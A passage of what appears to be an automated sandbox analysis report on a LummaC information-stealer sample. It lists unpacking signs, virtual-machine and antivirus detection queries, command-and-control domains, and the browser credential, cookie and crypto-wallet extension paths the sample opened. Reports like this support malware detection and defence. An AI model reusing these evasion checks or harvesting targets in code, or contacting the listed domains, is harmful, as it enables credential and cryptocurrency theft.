            Source: C:\Users\user\Desktop\filename.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\filename.exeUnpacked PE file: 0.2.filename.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\filename.exeUnpacked PE file: 0.2.filename.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00447249 push esp; ret 0_2_004472A0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043E340 push eax; mov dword ptr [esp], EDECF322h0_2_0043E342
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00444B64 pushfd ; retf 0079h0_2_00444B65
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_00444E18 pushfd ; retf 0079h0_2_00444E19
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_008DDBC3 pushad ; ret 0_2_008DDBC4
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_008DFB00 pushad ; ret 0_2_008DFB01
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_008DC731 push 892C0500h; iretd 0_2_008DC737
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_024AE5A7 push eax; mov dword ptr [esp], EDECF322h0_2_024AE5A9
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02497E08 push cs; retf 0_2_02497E09
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0247DEFC push ebx; retf 0_2_0247DF0A
            Source: filename.exeStatic PE information: section name: .text entropy: 7.3851056058800415
            Source: C:\Users\user\Desktop\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\filename.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\filename.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: C:\Users\user\Desktop\filename.exe TID: 7600Thread sleep time: -180000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\filename.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: Amcache.hve.4.drBinary or memory string: VMware
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: filename.exe, 00000000.00000002.1532096286.0000000000916000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395609830.0000000000960000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532096286.000000000095B000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000003.1395777943.0000000000966000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.4.drBinary or memory string: vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 9c 31 6b 7d 78 89-be 90 b3 22 a5 ab 1b 52
            Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\filename.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0043CCE0 LdrInitializeThunk,0_2_0043CCE0
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_008DAA93 push dword ptr fs:[00000030h]0_2_008DAA93
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_0247092B mov eax, dword ptr fs:[00000030h]0_2_0247092B
            Source: C:\Users\user\Desktop\filename.exeCode function: 0_2_02470D90 mov eax, dword ptr fs:[00000030h]0_2_02470D90

            HIPS / PFW / Operating System Protection Evasion

            barindex
            LummaC encrypted strings found
            Source: filename.exeString found in binary or memory: bashfulacid.lat
            Source: filename.exeString found in binary or memory: tentabatte.lat
            Source: filename.exeString found in binary or memory: curverpluch.lat
            Source: filename.exeString found in binary or memory: talkynicer.lat
            Source: filename.exeString found in binary or memory: shapestickyr.lat
            Source: filename.exeString found in binary or memory: manyrestro.lat
            Source: filename.exeString found in binary or memory: slipperyloo.lat
            Source: filename.exeString found in binary or memory: wordyfindy.lat
            Source: filename.exeString found in binary or memory: enterwahsh.biz
            Source: C:\Users\user\Desktop\filename.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\filename.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
            Source: filename.exe, 00000000.00000003.1459281538.00000000009B7000.00000004.00000020.00020000.00000000.sdmp, filename.exe, 00000000.00000002.1532096286.000000000095B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe
            Source: C:\Users\user\Desktop\filename.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: filename.exe PID: 7512, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
            Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
            Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
            Source: filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: filename.exe, 00000000.00000002.1532096286.000000000097C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: filename.exe, 00000000.00000003.1434347762.000000000097B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\xte0v1np.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\filename.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
